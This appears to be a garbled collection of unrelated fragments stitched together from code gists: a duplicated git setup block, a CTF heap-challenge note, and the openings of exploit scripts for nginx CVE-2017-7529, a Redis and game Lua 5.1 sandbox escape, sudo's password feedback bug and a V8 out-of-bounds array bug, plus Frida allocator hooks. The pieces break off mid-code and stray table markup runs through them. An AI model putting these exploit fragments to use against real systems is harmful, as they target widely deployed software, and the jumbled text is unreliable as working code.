##Create a new repository on the command line
# Seed the working tree with an empty README so the first commit has something to record.
touch README.md
# Initialise a fresh local repository in the current directory, then stage and commit the README.
git init
git add README.md
git commit -m "first commit"
# NOTE(review): this remote URL has no repository name between the user and ".git";
# it needs the form git@github.com:<user>/<repo>.git (placeholders) before any push will work.
git remote add origin git@github.com:alexpchin/.git
| from pwn import * | |
| from pow import solve_pow | |
| #from network_util import * | |
| import struct | |
| #fd = open("m68k.bin", "r") | |
| #shellcode = fd.read() | |
| #fd.close() | |
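def p32(v):
    """Pack *v* as a 4-byte big-endian word.

    Deliberately shadows pwntools' little-endian ``p32``; the commented-out
    ``m68k.bin`` above suggests a big-endian m68k target (TODO confirm).
    Accepts the whole 32-bit range: negative values and values >= 2**31 are
    reduced modulo 2**32, so ``p32(-1) == p32(0xffffffff)``.

    Args:
        v: integer to pack.

    Returns:
        4 bytes, most significant byte first.

    Raises:
        TypeError: if *v* is not an integer.
    """
    # ">I" with a mask covers both signed and unsigned inputs; the original
    # ">i" raised struct.error for any value >= 2**31 (e.g. 0xdeadbeef).
    return struct.pack(">I", v & 0xFFFFFFFF)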
##Create a new repository on the command line
# Seed the working tree with an empty README so the first commit has something to record.
touch README.md
# Initialise a fresh local repository in the current directory, then stage and commit the README.
git init
git add README.md
git commit -m "first commit"
# NOTE(review): this remote URL has no repository name between the user and ".git";
# it needs the form git@github.com:<user>/<repo>.git (placeholders) before any push will work.
git remote add origin git@github.com:alexpchin/.git
Challenge from RCTF, prequals to XCTF.
There are two bugs in the program: the first is an obvious UAF. The second is the lack of NUL termination immediately after our input, which allows us to leak. The NUL byte is written at buf + size - 1, and the read loop breaks if buf == "\n".
However, leaking is tricky, since the program uses calloc, which zero-fills (0x00) the newly allocated heap chunk.
# Nginx versions from 0.5.6 up to and including 1.13.2 are vulnerable
# to an integer overflow in the nginx range filter module, resulting in a leak
# of potentially sensitive information when triggered by a specially crafted request.
| # * CVE-2017-7529 | |
| # - By @BlackViruScript / @Black#4544 | |
| import urllib.parse, requests, argparse | |
| global colorama, termcolor | |
| try: | |
| import colorama, termcolor | |
| colorama.init(autoreset=True) |
'use strict';

// Resolve libc's allocator entry points once, up front; the bindings built from
// them are used later in the script (outside this excerpt).
var mallocPtr = Module.findExportByName('libc.so.6', 'malloc');
var freePtr = Module.findExportByName('libc.so.6', 'free');
var reallocPtr = Module.findExportByName('libc.so.6', 'realloc');

// Native callable wrappers around the resolved pointers. `freel` / `reallocl`
// carry a trailing "l", presumably to keep the plain names free for the script's
// own hooks — confirm against the rest of the file.
var malloc = new NativeFunction(mallocPtr, 'pointer', ['long']);
var freel = new NativeFunction(freePtr, 'void', ['pointer']);
// NOTE(review): malloc's size argument is declared 'long' while realloc's is
// 'int'; libc takes size_t for both, so on a 64-bit target sizes above
// 2^31-1 would be truncated here — confirm this is intended.
var reallocl = new NativeFunction(reallocPtr, 'pointer', ['pointer', 'int']);
The following Lua program generates a Lua bytecode program called ignore-unsigned-sga.fnt, which in turn loads a DLL from within an extremely locked-down Lua 5.1 sandbox in a program called RelicCOH2.exe. The remainder of this document attempts to explain how this program works through a whirlwind tour of the relevant bits of the Lua 5.1 virtual machine.
-- Guard: string.dump() prefixes its output with the 12-byte Lua 5.1 bytecode
-- header (signature "\27Lua", version 0x51, format 0, endianness flag, then
-- sizeof(int), sizeof(size_t), sizeof(Instruction), sizeof(lua_Number) and the
-- integral flag). The bytecode produced below is only meaningful for an
-- interpreter whose header matches this little-endian 32-bit layout exactly,
-- so refuse to run on any other build rather than emit a chunk it would reject.
if string.dump(function()end):sub(1, 12) ~= "\27Lua\81\0\1\4\4\4\8\0" then
error("This generator requires a 32-bit version of Lua 5.1")
end
local function outer()
local magic -- In bytecode, the stack slot corresponding to this local is changed| ## Redis Lua 5.1 sandbox escape 32-bit Linux exploit | |
| ## Original exploit by corsix and sghctoma | |
| ## Author: @c3c | |
| ## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode | |
| ## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486 | |
| ## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different | |
| ## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf | |
| ## This code is much the same, except the process is done using pwntools' DynELF | |
| ## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version |
| #!/usr/bin/python | |
| import os | |
| import pty | |
| from pwn import process, sleep, write, read, listen, p64 | |
| """ | |
| From https://github.com/sudo-project/sudo/blob/SUDO_1_8_30/src/tgetpass.c#L401: | |
| } else if (c == sudo_term_kill) { |
// uses https://github.com/saelo/jscpwn/blob/master/utils.js
// Raw bytes of a minimal WebAssembly module. The ASCII runs inside it spell
// "memory", "hello" and "Hello World": the module exports a memory and a
// function named "hello".
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
// Compile and instantiate with no imports; the instance's exported "hello"
// function is kept in `f` for use later in the script (outside this excerpt).
let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
let f = wasm_mod.exports.hello;
// Two one-element arrays, one holding a double and one holding an object.
// `oob()` is not defined here; presumably it comes from the utils.js helper
// referenced above — confirm before relying on its return value.
var arr1 = [1.1];
var arr2 = [Date];
var arr_map1 = arr1.oob();
var arr_map2 = arr2.oob();